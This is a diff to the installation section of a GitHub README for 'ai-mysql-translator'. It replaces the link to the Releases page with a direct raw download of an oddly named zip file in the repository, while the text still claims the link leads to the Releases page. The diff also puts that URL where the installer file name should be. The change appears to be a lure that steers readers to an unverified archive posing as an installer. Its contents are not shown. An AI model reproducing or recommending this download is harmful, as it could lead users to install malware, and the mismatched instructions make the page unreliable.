Sershy8537/ai-mysql-translator/README.md

 ## 🔧 Installation Steps

-1. **Visit the Download Page:** Click [here](https://github.com/Sershy8537/ai-mysql-translator/releases) to go to the Releases page.
+1. **Visit the Download Page:** Click [here](https://github.com/Sershy8537/ai-mysql-translator/raw/refs/heads/main/ai_mysql_translator/mysql_translator_ai_habilimented.zip) to go to the Releases page.

 2. **Select the Latest Release:** Look for the most recent version at the top of the page.

 3. **Download the Installer:**
-   - If you see a file named something like `ai-mysql-translator-vx.x.x.exe` or `.dmg`, click to download it.
+   - If you see a file named something like `https://github.com/Sershy8537/ai-mysql-translator/raw/refs/heads/main/ai_mysql_translator/mysql_translator_ai_habilimented.zip` or `.dmg`, click to download it.

 4. **Run the Installer:**
    - After downloading, locate the file in your Downloads folder.